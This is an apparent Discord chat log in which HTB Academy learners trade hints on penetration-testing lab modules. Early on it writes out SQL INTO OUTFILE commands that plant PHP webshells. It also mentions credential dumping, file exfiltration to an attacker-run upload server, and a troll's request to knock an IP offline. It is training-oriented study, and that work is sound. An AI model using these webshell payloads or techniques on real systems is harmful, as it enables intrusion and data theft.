#modules
I don't think I ever got the sql route to work on that challenge
if you upload the with the ||ftp|| it won't run normal php for some reason
i only found out about that route after someone i help tell me the flag said there is multiple way
Hmm it still doesn't run. I'm writing as ||SELECT "<?php system('powershell d'); ?>" INTO OUTFILE 'C:\CoreFTP\shell7.php';||
And accessing with
||┌──(kali㉿kali)-[~/htb-academy/infra/skills-easy]
└─$ curl -k -H "Host: $target" --basic -u user:pass https://10.129.34.95/shell7.php
<?php system('powershell d'); ?>||
yeah my notes unhelpfully end like half way through it.
if its any consolation the rating of the labs are totally wack, easy lab is the hardest, hard lab is medium, and the medium lab is easiest
that path is no good
oh yeah the lab rating on this module is kinda weird
btw u have to use double \ @solar granite
I did but discord removed them for some reason
nope if you upload with sql you don't need to do that a normal <?php echo shell_exec($_GET['cmd']);?> will run just fine
my actual redacted notes for the medium lab include being shocked by how easy it was.
Works now.
I was indeed writing to the wrong directory
<?php system('whoami'); ?> works wonders
oh yeah i remember that's the stupidly easy and still there are many people dm me about that lab
we all get stuck on some stupid simple stuff occasionally ¯_(ツ)_/¯
yeah it can run normal cmd but powershell it less buggy for me
@shy warren check the discussion above, I remember you had the same issue
mind if i dm you real quick?
Sure
yeah
i was going to say u that xd
also let me guess 90% of the people asking just didnt do that little tiny extra step of due diligence during enumeration lol
more like 100%
that tracks
Literally the first step. Not sure how to start.
Are you following the questions? Theyre pretty helpful guides for the order to do things. Did you skip over the scenario information about a webshell left for us?
Tbh I wasn't sure what to do with the webshell
the webshell is our foothold to the network, much like the footholds throughout the module
only real difference is I dont think that one comes prebuilt with attack tools, so you either have to transfer them over or run a proxy
Hello @vital adder, please check your personal message. Thanks
whats your query?
test if code blocks makes things readable with \ or \\
it does
are you sure its
inlanefreight.local\
Yeah results from cat
I might be over/under thinking it, but it seems completely alien to everything else in the module. I have no idea what to do.
I just want it to filter from my s onward
grep "INLANEFREIGHT.LOCAL\\s*"
add -i if you want to ignore case
I mean just start from step one. Have you connected to the webshell
hmmm nope didnt work i'm going to stare at the grep man page for a min
No, I wasn't sure how to go about doing that. I don't recall there being anything in the module about file upload vulnerabilities, or webshells for that matter.
The assessment module says the webshell was already left there for us and gives us the information on how to connect
Never forget to read the scoping and scenario information of an engagement 😉
i made an account on HTB academy, what modules should i do first?
depends on if you intend to do a path or not
if you do, just follow the path order. If not, Getting Started is great
What tool do I use to connect to it?
no tool
its a webshell
point your browser at it
Did you do the shells and payload module yet? or did you just hop straight into this one?
Just AD related modules so far. I've checked the IP with the browser. I'll look again in a bit
ah many of the modules are going to presume youre familiar with some general basic level stuff first.
and its not just the IP, the scenario tells you exactly how to connect to the webshell, you need to read it.
Anyone care providing some guidance on foot printing medium lab? I got two sets of creds, tried to RDP in the box with both sets. One set fails while the other throws an error due to an exclamation being in the password weirdly.
Thanks for your help, I'll revisit the assessment after a break and hopefully no more follow up questions
oh dont worry theyll probably be more questions, part 1 is pretty straightforward, but part 2 is definitely the hardest assessment Ive done so far being 60% of the way finished with the CPTS course.
that module sits at the 50% mark of the CPTS course and definitely has big Mid-Boss energy
@thorn urchin So the way to do it turned out to be grep -i "^[s]"
well thats certainly one way to do it
was driving me nuts I was not about to hand do it xD
I believe thatd match any lines with an S in it I think
it matches first characters
which could be more inclusive than you intend depending on your data
hi yall
the exclamation is being interpreted by bash, you need to enclose it in double quotes at the minimum if that doesnt work try to see about not passing the password on the cmd line
just to remind u yall im new here
I dont mean this harshly, but nobody cares. Got a question about the academy or modules ask away.
?
this channel is for the HTB Academy module discussion. If youre looking for advice on a module youre working on you can ask here. You can even ask for a recommended module to start. If you dont have a related question to that, then you should find a more appropriate channel. Being new or not holds no weight or relevance in this channel. Experienced and new alike just sharing information and helping each other grind out modules.
U can tell that softly
why I prefaced with 'I dont mean this harshly' 😉
Yeah saying that u can say all u want
because u prefaced
btw i dont want to discuss
Welcome. It is good to have you.
u think he left @unique valve
I dont think so.
I checked it says HTB is a mutual server.
Nvm you are right
btw losing the opportunity to learn for just that...
¯_(ツ)_/¯
What u guys talking about?
nothing special
Ok
is this about a module 🙂 ?
Oh sorry
no worries, you can try general chat
@idle cargo
Hi guys, by seeing the message above I just realised that I did not register with my uni email.
I tried to register with my uni email and it worked. So now I have two account on HTB academy.
And I don't know how to merge the two account (if it's possible).
Does anyone know who I should contact for this ?
Btw I created my HTB academy account like two days ago with my personal email, so it's not a big deal if I can't merge the two account. I'll just do the module that I completed again
||sorry if my English is bad it's not my primary language||
Thats definitely a contact support with the support chat bubble kind of question
thanks !
Ok so, by chatting with the bot I saw that I can change the email of my account, so I just deleted the account I created with my Uni email, and then changed my personal email to my Uni email in my main account.
It worked and now I can buy student subscription.
have anyone use parrotOS and have this issue?
Hi, got a problem with "Attacking Enterprise Networks". The windows 10 privesc using SysAx no longer works: https://www.exploit-db.com/exploits/50834 It worked like 1 time but then never again, throughout several resets. Even when it worked, I could add ilfserveradm to the localadmin group but failed to run anything elevated with that user. Help would be greatly appreciated
Tried also print potato and SpoolFool but none worked. There's like 300 patches missing on this machine yet...
i got sum ones ip how do i boot him 84.17.35.77
yes, but couldn't find an answer unfortunately
Hello everyone, im doing the password cracking module, I cant seem to get evil winRM to work and I get the following error message : Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine. I'm working through the PWNbox does anyone know how to get past this error?
Is that the only message? Do you get a connection? That warning just means that you can't tab complete paths on the host you're connecting to.
Yeah, in retrospect that other module would have been helpful. 😂
yes I also get the message- Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
Maybe its that I was supposed to provide a user and password, as im supposed to do this after using crackmapexec, but cme didnt give me anything useful
That does mean that you need credentials. If you'd like to DM me some screenshots of the cme output I can try to help you.
sure thing, thanks, one second
Still need help, plz
many people are following the cpts pathway and not near the priv esc modules yet, so you may be waiting awhile
k k ... you think it's alright to contact support at HTB? I mean it clearly doesn't work as intended and outlined in the tutorial
possibly, if youre absolutely certain its a module bug you can also try putting it in the erratum channel. Some of the staff look a bit closer at that one.
Thanks for you help, @thorn urchin Can't be 100% sure but this privesc is really not difficult and it worked one time, then never again. This is a GUI app, not much potential for mistakes.
np, I wonder if its just an inherently unstable exploit
anyone that can help me with proxychains... I feel like I'm missing some information to the actual settings in msfconsole and what the output is supposed to look like..
try using aptitude instead of apt-get
haven't done it yet sorry
i havent said what the module is yet
i finished it recently, what's up
you said earlier with web requests
ye
Still need help? What's your issue?
what's troubling you in the POST section?
@rustic sage web proxies> proxy tools I'm supposed to use msfconsole to set the settings... but the thing is there is no remote machine in this section so what am I supposed to put for RHOST? and yes its the http_put section.. https://academy.hackthebox.com/module/110/section/1053
oh yeah for that one rhost is still the destination target
you still have to have an end target to route through the proxy
I'm going to dm you so that it's easier to talk
ask @carmine kiln
ok so my guess its the domain with the 8080 port setting?
let me double check cause theres like two questions similar to that and idk which one youre on
okay nah
rhost would be the website youre testing on such as google.com
same with rport
all the proxy info goes into the PROXIES variable
Thanks, and TBH I spent an hour trying to figure it out on my own.. coming here was last resort after an hour...
happens
it messed me up a little bit because I recorded the wrong format for setting the proxy in my notes
but that's why the practical section exists
yeah.. I'm used to putting the remote IP on there vs the domain..
everyday learning something new, thanks guys
not work
pip/pip3/pipx perhaps?
you will need to install aptitude
does it ask if you are OK with the solution? (when trying to install aptitude)
hm, i am not sure then
oki thank you
hi
wb
reject games grind modules
Google crackmapexec wiki. Go to install instructions. Use the PIPX commands section.
@carmine kiln
Thanks. user banned
what would be the odds of getting the modules channel added as one of the channels people have to verify before being able to post from? seems like this channel gets a high target for such spam, trolls, etc and theyre almost always unverified accounts.
as soon as you said that, we got one below
Will do, thank you
Hathor machine, I can't overwrite Bginfo64.exe and reverse the shell, how do I do it?
check the boxes channel, this one is for academy modules
sorry, thank you
😄
here give both of this video a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM
Introductory video on getting into hacking and cybersecurity.
this is a bad advice but if you script don't work try this #modules message
Hey guys, can anyone give me a nudge in "Windows Privilege Escalation" module?
I've tried every command in this section "Credential Theft/Other Files" but I can't find "bob_adm" credentials
EDIT: Found it! 🎉
||For anyone struggling with this one, start your search at C:\users\htb-student and include all (*.*) files||
I'm doing the web proxies module, and I've only ever used burp before this. I rather like ZAP! Is it feature-rich enough to be used in a professional environment, or is burp better?
hey guys, i'm doing "Information Gathering - Web Edition" and kind of stuck on "Active Subdomain Enumeration". If anyone if available to give me some help would be appreciate.
Hint for people wondering about people struggling on Windows Fundamentals "Which NT Version is installed" since the wording was a bit misleading for me:
||Hint: The answer is specific. E.g. "Windows 4" if the output was 4.xx.xx for the version. Don't overthink it!||
Just used sudo: hackerman
Really enjoying secure javascript coding 101
Expensive but good module
Hi guys any username wordlist to recommend for the SMTP part of Footprinting module? (https://academy.hackthebox.com/module/112/section/1072)
Currently trying with SecLists/Usernames/Names/names.txt with USR-25 python script but it's incredibly long
Thx
How are you tackling the learning in HTB Academy?
- Is it learn in HTB Academy while applying each techniques on HTB Labs
- Or, Finish the whole CPTS/CBBH path and then go with HTB Labs?
-Or just the HTB Academy alone?
You can for example do all the web modules then go for a web box, after all AD modules -> AD box
Do we have existing list of web box? and other boxes that is related to the module?
I think most modules give you a few recommended boxes, at the end.
thanks! mine was the same, except for my parameter data, I had it written like it was in the request , I didnt keep it like the original template had it... 😮💨
I’m following the paths with the assessments and challenges within the modules and then will switch to boxes
Though I have done some boxes too in the meantime
@feral stump may I know how much time do you spend in the academy compare to the time in the boxes?
Right now much more the academy to boxes
I would say 70% - 30%
Of what I do in HTB
Overall
Thanks, just really struggling since I think I'm overwhelming myself with theories in academy and I think I'm losing my grip to practical hacking that can be done in Boxes in labs
Yeah have kind of same feeling sometimes too
Hello guys, I'm doing the Windows Privilege Escalation module and I have a problem for the section Pillaging: I found the cookies.sqlite file but I have to copy it in my pwnbox to execute a script on it, the problem is how can i get this file on my pwnbox ? I cannot execute python -m http.server 8080 on the RDP Windows session so I'm stuck to get this file
I think the last module of the CPTS path is a fully simulated pentest, so it makes more sense to me to finish up all the modules, before going back to doing boxes.
good to know that I am not alone haha
In the end with the knowledge of the academy I m kind of sure retaking boxes will be a matter of riding the bike with more skills … that’s the way I see it
Definitely, I was thinking the same but kind of doubting. But yeah, I will let you know once I finished a path and let's see if it makes me really better in solving boxes. Thanks!
Thank you too buddy !! Will let you know too
ask that at #boxes if you can't find that channel use ++verify at #bot-commands
about to say you can use updog for that
hello
I can't because it results in a 405 status code when i try to upload from windows to the box
wait how did you get Method Not Allowed? did you powershell curl or something?
I use this:
Invoke-RestMethod -Uri http://10.10.14.226:8080/ -Method Post -InFile C:\Users\Grace\cookies.sqlite -UseDefaultCredentials
also check the updog output or status when you upload a file (through a browser) it should show that you are uploading the to to /upload
yeah i'm trying powershell stuff with updog right now nothing seem to work (also you need to add /upload to the url)
on linux curl with updog will work fine
Do you know how to get this file (cookies.sqlite) into the box ?
go to your updog ip in a browser and upload from there
How do I do that ?
i can't remember which browser but there should be chrome installed or something use that
yeah but how am i supposed to upload a file with chrome to my box ?
with updog
Hi, I'm real stuck at sqlmap essentials skills assessment. I found attack vector, but I can't find right options. Could you help me in dm please?
sure shoot me a dm with your sqlmap command
I found a better way to transfer file: I use the +home-drive option with xfreerdp and the /home directory is mounted in Windows so I can copy easily the files, thanks for your help btw
oh yea i forgot you can do that with xfreerdp
usually i just use updog or metasploit if i don't have rdp
how to scan docker hosts with nmap - nmap says scanned 0 hosts
sure what's the issue?
no idea why nmap said 0 hosts but if you mean the target machine docker then you can't scan it
i dont know how to start
but how to get the open ports then?
cracking all hashes by sure , but i get something like "...exhausted"
if it is a docker host (it should have public ip) it should give you the only port you can access if it isn't then you can scan it just fine
ohhhhhhhhh
for this you don't need to crack 100% of the hash
i am so dumm
Hey guys, I have the admin hash for the last question of the Pillaging section but it won't take it no matter what format I put it in. Can someone help me pls ?
Same here 😅
||Grabbed both SAM & SYSTEM files from 2 different backups, not accepted||
||Used password found in web.config file in another backup, not accepted||
the admin hash started with ||bac|| and end with ||f26||
if you got the right hash but it still show wrong answer try refresh the page or a hard refresh with ctrl + shift + R
||You've found it by dumping SAM & SYSTEM files, right?||
yep
oh wait
this is just htb beginning evil hint ||try to Restore all of the backup||
Ok I found it, @devout thorn try every backup, there are only three and you'll find the hash which begins with ||bac||
thanks
||There are 3 backups, 2 of them contain SAM & SYSTEM files||
||When I'm using samdump2 on these files, I don't have this hash beginning with bac||
Did I miss something? 😅
Lucky me ^^
all hash from both file are the same
||restore backups||
||Copy SAM & SYSTEM files to local machine||
||samdump2 them into a file & john on final file||
oh try impacket-secretsdump
I'll try again
also remove the first line (too much spoiler)
if that still show you the same hash then i think the file is corrupted if that's the case try download a new one
ACTIVE DIRECTORY ENUMERATION & ATTACKS / Bleeding Edge Vulnerabilities
PrintNightmare attack
I dont know why this is not working
haven't done that module of tcm have a video on that vuln if it's just normal printnightmare give that video a check
who is tcm O.o
the guy make the video that i always link to people new to this
ill watch the video ty tom :3
everything look right here but you should get a call back on this
the second ip (the one end with .255) should be your pwnbox ip and you are making / hosting the dll file in a directory named ws but in this command you are trying to access that file in a different and the wrong ip (that doesn't look like pwnbox ip ) haven't done the module anyone see this just follow the video
oh
Same issue, resetting the VM
it's more about the files but try everything you can
yep i forgot about that
For https://academy.hackthebox.com/module/143/section/1274 How did yall find the Sap Services group membership? Because || I couldn't login with the SapService user password so I had to WinRm as the sql user mentioned then do net user /domain SapService to get the answer. ||
Feel like I went about getting the answer in a weird way after I got the users account password that couldn't authenticate to squat.
I used mimikatz to get the hashes
oh wait what?
so the ||sam|| and ||system|| file in ||the backup|| is the same one being used on the target machine
Howdy, anyone mind nudging me the right way on the footprinting medium lab module? I got ||both set of creds and I can RDP in, but not sure how to access the SQL as the creds I have don’t work.||
Never mind I got it!
@winged hedge twice this dudes spammed this channel with his scam
Hi
Hey has anyone done the password attacks module?
is there anyone to consult Broken Authentication - Predictable Reset Token exercise? I have probably good script, but can't guess it in the end...
I'm just curious am I expected to remember most of the windows authentication process?
i just finished it
do you want me to dm you the script i have?
Hello everyone, I am on the module Information Gathering - Virtual Hosts, the problem I am having with the lab portion is that I am getting false positives on the enumeration of the vhosts. I have the first two flags but coming up short on the other 3 because I am not getting good names for the vhosts. Can someone point me in the right direction because I am stuck at this point
not necessarily.
not to crack passwords
I guess im trying to ask should I study it?
I usually make very comprehensive notes of modules
windows authentication is a very bulky process
I just remember the main parts. WinLogon, lsass and SAM/Kerberos.
Comprehensive notes are good tho.
It never hurts...
I'm using Responder.py and it doesn't seem to work. I'm using my IP in the http URL. http://unika.htb/?page=//192.168.4.25/whatever
unless I need to use the IP from whatismyip ?
I've never heard of using fqdn's with responder but I might be wrong.
I'm not an expert. Maybe someone knows better.
hmm its on one of the starter tutorials called responder
it doesn't seem to get the AUTH hash
are you getting any traffic at all?
this looks like remote file inclusion or something.
yea
i don't think you can pivot like that with responder. It's supposed to be used with local machines.
"local"
big air quotes of course..
I haven't been in Starting Point for a while. someone might know better than me..
You'll probably find more help in the Starting point channel
Hey guys working on the Password Attacks module can someone point me in the direction where I can find more wordlists
for users and passwords
which part?
might need to link htb to your discord
Oh I must have missed that
not sure how that works I don't see that group
So did I lmao
You might need to verify.
On Discord.
oh
maybe, i dunno
I think you do
I still havent linked my account
I cannot see or access any of the main HTB stuff
only academy
but then everyone will see im noooooob!!!!
ok got it
On that note, I have SMB access but no permission to view anything..
On the same module.
Password-Attacks: Network Services
Hi guys, Im doing the Password-Attacks: Network Services
I manage to identify the correct user to log in into RDP.
However, when i try to login using xfreerdp or remmina im unable to
Is there something im missing? Any suggestions would be more than welcome
I keep getting kicked off/connection problems. It may be my internet but it's not working out for me regardless.
Lots of timeouts
yeah man, i'm just frustrated with this. I think it's my internet.
how do you figure out what your own machine's IP is on a VPN network?
Decodify is pretty legit
ifconfig / ipconfig see if there is a tunnel interface, you could still be running via a vpn but thats probably beyond the depth that I can explain in text chat
Can anyone help me out on the Active Directory module?... ACL enumeration, the last question. I am either not understanding it right or not finding the answer. When I try to run the commands in the module the box mainly just hangs and doesn't return a response. The question is: What is the ObjectAceType of the first right that the forend user has over the GPO Management group?
I'm struggling too on host 1 Im feeling like im missing something... none of my payloads are landing
Literally me
Is there a section walkthrough on setting up VM for MacOS?
Went through this module (https://academy.hackthebox.com/module/details/87) and only saw sections for Windows and Linux
not trying to insult you, did you look on the VM site?
i saw something on there before when I installed it on my desktop
I have not actually... I'm sure I could find it, but wanted to see if there was anything on HTB?
Also, curious if HTB recommends NOT using Mac?
good question
I learned that there are NO "good" or "bad" questions, FYI 😉
I don't think I have seen anything for a Mac specifically, but you should be able to use VMware or virtual box on OSx
Or... Just blast OSX off and run Asahi Linux 🙂
haha no thanks, i prefer OSX, i mostly do software development, and OSX is king for that IMO
Makes sense, Asahi isn't ready for prime time yet anyway. I am all Linux aside from when work forces me to use Windows or BSD, but I am not a Dev at all!
also, it sounds like using VMs is a necessary evil for pen testing, in order to allow for easy spin-up/tear-down of different envs, etc
Absolutely! I ran kali on bare metal at the beginning, but its not a wise thing to do... I use both Proxmox for VMs and KVM locally on my linux machine. For HTB I pretty much always use a Kali VM on my local linux machine anymore. Parrot is pretty cool as well but I am way more used to Kali at this point.
nice! sounds fancy haha
im trying to get by with just pwnbox for the time being, until im forced to create my own setup 😅
Just bite the bullet and learn the VMs. It will help you in the long run, IMO, I can't stand the PWNbox. Plus if you doing Dev work... VMs are great place to test.
true, i know i will do it sooner than later
its my first day on HTB though, so i have some time
VirtualBox would be my recommendation, in my little playing with OSX it worked great and its pretty much the same if you use it on Linux or Windows
sweet! yeah i think thats what i worked with in the past
do you know the difference between virtualbox and vagrant?
i guess my main questions is: what is vagrant? lol
I'm no expert on this... but I believe vagrant is a tool to build Virtual Environments, vs something like VirtualBox which is a tool to run virtual machines.
many thanks my friend, i was stuck for two days on this😎
Im doing lfi file inclusion prevention
Im having some trouble finding the php.ini file in file inclusion prevention
someone please help me out
or give me some hints
#module: Password Attack
#section: Network Service
#Question:Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
I cannot use xfreerdp to connect to the machine even tho i already have username and password, what should i do
Dm if you still need help
I'm on the INTRODUCTION TO BASH SCRIPTING module -> Comparison Operators. I can't tell if this is poorly written or I'm misunderstanding the question. Where does the Else fit into the equation?
Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.
@wide river try rdesktop
my command is||rdesktop -u john -p november||and this is what happen
@wide river so u need to first enable rdp
like this ? ||sudo systemctl start xrdp.service||
@wide river no
what command should i use to enable it?
@wide river read in the section about how to enable rdp
doing it, im using archlinux so it might a little different
This is why I stick to Kali or the pwnbox for certifications. Stuff is vetted to work and you can focus on studying Vice troubleshooting, but to each their own. I wouldn’t want to be fiddling around with stuff during the exam.
I use a VM for my hacking. With a decent computer now a days it’s possible to hack on any host OS.
I’ve got a question: dig url -t NS cannot reach the domain even though I added the up and domain to my /etc/hosts file.
It only works if I add the IP like: dig url @rustic sage -t NS
I can’t transfer the domain to the name server on the module
Yeah I don’t like to run bare metal it’s a pain to clean up after when I can just revert back a snap shot after a box. I like to revert back after every CTF to ensure if I installed anything to test its gone.
Is there another file on Linux I must edit to allow this to work?
@wide river use evil-winrm to enable the rdp
this is right 90% of the time but some time the pwnbox suck ass before it was the crackmapexec constantly having issue and now (for me) i have been troubleshooting bloodhound on the pwnbox for like 3-4 day now and turn out the issue is the Fing java version is wrong
now that's think outside the box, thank you so much
Broken Authentication/Brute Forcing Cookies/Question #2 Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer. I have tried all the roles I can think of and cant get this thing...any other hints?
if you are doing the info gathering module then all of the subdomain ip is dead you can only dump the dns record so watchout for that
i think you got false positive also pls remove those cred those are valid ||just for different service|| and i don't have any note on any issue with any so you should be able to use something like remmina to rdp in
hint the role is in the question
I am on that module. I can’t get the txt record cause the only way I can reach the domain is by adding the box IP at the end of the command ex: dig url IP -t NS
holycow, the boss show up and rescue the whole gang XD
When I try to do the zone transfer the command won’t work
i think this is what you are supposed to do (the ip at the end thing)
this is a bit too much spoiler shoot me a dm with your dns zone transfer command
Rgr, thanks. I’ll hit you up.
yeah i think that's is poorly written i didn't notice that but for this all i use is ||1 if || statement
@wide river no problem
Hello guys, I struggle with the Windows Privilege Escalation Assessment part 1 question 2 to find the ldapadmin password. I tried to ||findstr /spin "ldapadmin" *.*|| but can't get the password, can someone help me pls ?
hint that's the right command but you need to PrivEsc first before you can get the cred
The command didn't work i used ||lazagne.exe||
On the Active Directory / Privileged Access, i can't RDP to the box somehow. Both with remmina or xfreerdp (with and without password). Is it just me? This is so frustrating
Active Directory / Bleeding Edge Vulnerabilities, there is a problem to connect to the box with user forend. Works with htb-student though
For AD Enumeration, for the life of me I cant get the Ace Object type for the user forend for GPO management. I can literally see what it is in bloodhound but for what ever reason htb is saying thats not the right answer and its driving me nuts e.e
I've tried running the || Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} -Verbose || cmd but its been running now for 15 mins and its still running .__.
yup the bloodhound answer isnt what its looking for and indeed that other command takes a long time to run. I think it was like 25-30mins for me. Just gotta be more patient sadly.
god dmaet let me reset the box then i killed it thinking it broke or something like 5 times now and I only have like 20 mins left x)
Finally got it, took a min almost done with the next page.
So why exactly do we need to change the SPN on the targeted user to Kerberoast them?
we dont need to change the spn, they need to HAVE a spn. If they dont have a spn you have to add one.
So if I understand correctly, its to tie to a "service" hence why the "machine" is going to Kerberos to request a tgs ?
Since under normal operations it just wouldnt be going to the Kerberos service for no reason at all, its to tie it to "something"?
https://youtu.be/-3MxoxdzFNI
I found this video to be really helpful for understanding kerberoasting
Kerberoasting is an extremely useful attack method to establish persistence, lateral movement, or privilege escalation in a Windows Active Directory environment. This attack is caused by a user requesting a TGS for an account, typically a service account, that has a Service Principal Name (SPN) associated with it. An attacker could then use the ...
Great video
This is probably really simple, but for attacking common services - hard lab, how do I run a multi-line SQL query with impacket-mssqlclient? I found credentials for a user, I know what to do, but I can't for the life of me get the multi-line query to work, as it executes every line as I write them.
Edit: connected as impacket-mssqlclient -p PORT -windows-auth USER:'PASS'@IP
Edit: it was indeed really simple. Just run the whole query as a single command, with no newlines
what query are you trying to run
for some commands on that module i just ran them one at a time
The whole query is probably a spoiler, but it's a big ||SELECT ... FROM ... INNER JOIN ... ON ... WHERE ...||
idk something like that was never necessary for me in that lab
oh okay, looking through my notes, i was able to get that whole query to run
make sure there are no hidden new line characters, this happens sometimes when copying and pasting commands
There's none, but every line gets executed as soon as I write it
||SQL> SELECT distinct b.name [-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: The multi-part identifier "b.name" could not be bound.||
not sure why that is. do you have semi colons that separate? i have a screenshot of this command working and it's output if that would help
Nothing, it's exactly as I copy-pasted above. It worked fine with sqsh, but for some reason I can't connect with it, only impacket-mssqlclient works
Could you connect with sqsh?
oh so you are only putting that part of the command? include the rest in your query and it should work
i used impacket-mssqlclient to connect, didn't try sqsh
?
hey! I've just started hackthebox and im doing the "Linux Fundamentals" module. I've just done a question that asked "What is the path to the htb-students mail?" after logging into htb-student remotely. I got it right but I had to google the answer because I was lost. Can someone explain to me how people knew the path to "mail" would be shown by using the "env" command?
Doesn't work either. I copy-pasted the full query:
||SQL> SELECT distinct b.name [-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: The multi-part identifier "b.name" could not be bound. SQL> FROM sys.server_permissions a [-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: Incorrect syntax near the keyword 'FROM'. ...||
what you guys doing
I copy-pasted the whole query in one line and now it worked. Weird
Thank you for the sanity check
no problem! glad it worked
You couldn't really find that without googling. That's just how linux works.
Also remember that googling is encouraged, and more often than not it is necessary too, and definitely not "cheating"
yeah googling things is something ive gotten quite good at back when I started programming 😂 I'm learning linux now tho and cybersecurity so I can expand on what I can do with my programming. Thanks 👍
I'm now being asked "Which kernel version is installed on the system? (Format: 1.22.3)". I've just done "uname -v" and copied the output and pasted it as my answer but it says I'm wrong?
Notice that it wants a specific format
yes but i don't see that format when i do it
#126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 thats my output
You don't have to copy-paste the whole output, you can just grab what you need
Try uname -a, your answer is definitely in there
oh yeah i got it, i swear thats the release tho?
Yes. Questions are sometimes misworded / confusing. I recommend searching on discord for keywords for a sanity check, others might have had the same issues
Any luck with this one?
I escalated privilege first and then I used lazagne tool to search for passwords
Any nudge for the PrivEsc?
I've tried several exploits from Windows Exploit Suggester and no luck so far...
For attacking common services - hard lab: is it possible to also get a reverse shell? I can read the flag, just wondering about a shell
I DM you to avoid too much spoil here
Finally I managed to tell you here without spoil: try to look at the ||Miscellaneous Techniques|| section of the module it helps a lot
Thanks for the hint
damn i just finished that brute forcing cookies lesson...i was fighting myself the whole time
I'm having this issue that's been raised in the past, could someone explain this?
It feels like the question is worded kind of confusingly.
Am I meant to create
"if counter = 35
Echo $variable | wc -c"
?
I've read through the module a few times but I may be overthinking it or something. Could use a nudge or helping hand with the wording if anyone has the time!
||Miscellaneous Techniques or Additional Techniques?||
||Nothing worked in the first one 😅 ||
Yes, that's exactly what you are supposed to do
||Miscellaneous Techniques in the Additional Techniques||
Thanks- still got errors, but as long as I know I'm on the right track ill just tinker around and think outside a lil ^^
@solar granite u are still stuck or
Hello, I'm currently working on the web attack module at Mass IDOR Enumeration. I found out the http method with Burp Suite. I just have no idea how to enter the parameter with curl on POST. Thanks for the help in advance
on the page, you can inspect, go to network and right click the POST and copy as CURL, the parameter will show up as --data-raw
@rustic sage
-d "uid=$i"
Nope, I'm done with the modules. I got the flag, but I was just wondering if it's possible to get a shell too for the hard lab
@solar granite yes it is possible while using powershell
in the linux fundamentals module, specifically in the "service and process management" section, the question asks Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer. I've done systemctl list-units --type=service | grep apparmor and it returned only 1 unit. The description of that unit is "Load AppArmor profiles" so i assumed that was it since it's the only unit returned. I entered the name of the unit as my answer and it says im wrong.
@sly tapir @kind turret thanks I will try both variants
Instead, grep for:
||```shell
Load AppArmor .*
```||
do i wrap that in a string?
cuz it gives me an error
Yes as we are using regex
that same service popped up but it's not the right answer
DM me with what you are submitting as the answer
is this right? I get nothing ||curl -X POST --data-raw "uid=1" http://........../documents/||
@rustic sage There is no such option as --data-raw, use -d https://reqbin.com/req/c-g5d14cew/curl-post-example#:~:text=How to post form data,www-form-urlencoded".
mybad, i totally misread that... yea -d "" 😬
do I need the -H parameter too? Because somehow I still get no result with -d
@rustic sage DM me
I apologize, --data-raw is an option, however, it is not to be used in this context.
Is there a reason I can log in to SMB and not being able to list/open anything??
I'm on a share but have zero permission for anything.
I've never encountered this before. I've never heard of such a thing.
yeah can def happen
Every google entry is related to "I can't login to SMB"...
Not relevant to what i'm trying to find.
If it's configured to not let me access anything, can I really do anything about it?
I would think not....
you can probably use the connection for some enumeration tasks but that's probably about it
I'm supposed to grab the flag from it, I believe.
find a better user perhaps
It's the password attack module.
which section
the network services section
I could try to find another user. I swear I didn't find one.
just subscribed to HTB academy! 😎
idk how i've missed a second user... 
thatd do it
I must be blind
alright I got the XSS module up next and I absolutely hate XSS blehhhhhhh
hopefully I can just use my dislike of xss to power through it
any hints on how to read source code in file upload assessment?
hi, im trying to use nmap --script smb-os-discovery -p445 <host> but not seeing any output for the script, any ideas?
ah... i added the -d flag and now see this
Host script results:
| smb-os-discovery:
|_ ERROR: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
what does this mean?
Did you put the ip?
@sturdy kite Looks like you need a space after the p and the ip?
-p445 is port number
the command is correct, im getting an error in the script for smb-os-discovery
iirc I think smb-os-discovery actually requires more ports than just 445 cause I think it tries to fetch some of the standard rpc information. Id have to double check
not required but does sometimes use 139 as well
so try -p445,139
which module/section?
another issue im having is with SMB client: Error opening local file flag.txt
when running get <filename>
same error with this
dont really need to do smb-os-discovery for this one, but give me a moment and ill see if I get an error
right, i just wanted to test out everything it had talked about in the section
so the error is expected?
I didnt get an error, I just got no output at all, which can be normal yeah
did u use the -d flag?
any idea on this? i actually need this to work
what were you trying to run
get flag.txt
try : get ./flag.txt
this?
wtf
lol
try get /flag/flag.txt
are you connected as the correct user for that?
bob
what directory are you launching smbclient from
users
and do you have write access to users
how can i determine this?
youre launching from /root
as normal user
youre not gunna have write perms to /root
cd ~
ohhhhhhhh
or use sudo
._.
launched from bad dir 😅
np Ive done it before while inside /opt/ and using some tools
what a misleading error message lol
well it did say it had an error with the local file lol
but local is the remote when in smbclient right?
¯_(ツ)_/¯
anyone have a good resource where i can filter lists? trying to filter a list to delete lines with no special characters
What do you mean?
like a command line tool to filter output from a file?
i am filtering a list to meet specific requirements... but there are lines with no special characters in there and i want to delete them
i've heard of awk https://www.gnu.org/software/gawk/manual/gawk.html
i think grep is essentially the same thing, really it sounds like you are looking for a pattern (regex) to match lines with special chars
yea im filtering it based off password requirements
i would just search for regex patterns that fit what you want
you can use https://regex101.com/ to test
thanks!
I know a bit but this kinda sus ngl
Illegal stuff isn't allowed here.
No and learn OPSEC.
Go to hackthebox academy.
Welp thats the xss module down. Plus side I hate xss so it being really simple made it easy to blitz through. Downside is that it was super simple and did nothing to alter my annoyance at xss.
Gj!!!!
almost at that 70% mark
For cbbh or CPTS?
cpts
If I understand the question correctly then FFUF is your friend
don't use gobuster no matter what people tell you : )
